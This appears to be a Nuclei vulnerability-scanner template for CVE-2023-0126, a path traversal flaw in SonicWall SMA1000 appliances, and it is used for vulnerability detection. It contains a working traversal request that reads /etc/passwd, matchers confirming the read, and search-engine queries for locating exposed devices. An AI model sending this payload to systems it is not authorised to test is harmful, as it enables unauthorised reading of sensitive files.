id: CVE-2023-0126 info: name: SonicWall SMA1000 LFI author: tess severity: high description: | Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-0126 - https://github.com/advisories/GHSA-mr28-27qx-phg3 - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001 - https://github.com/Gerxnox/One-Liner-Collections - https://github.com/thecybertix/One-Liner-Collections classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-0126 cwe-id: CWE-22 epss-score: 0.93027 epss-percentile: 0.99791 cpe: cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: sonicwall product: sma1000 shodan-query: title:"Appliance Management Console Login" fofa-query: title="appliance management console login" google-query: intitle:"appliance management console login" tags: cve2023,cve,sonicwall,lfi,sma1000,vuln http: - method: GET path: - '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd' matchers-condition: and matchers: - type: word part: header words: - content/unknown - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # digest: 4b0a004830460221009159adcc7d246164a9f2e545bea1182de9fc9040047715c6dd84d033c13331a2022100e0f0758f655f0a38c4c6f4ba3b3f0293bd82cf78f8d120e56590e86138c98eed:922c64590222798bb761d5b6d8e72950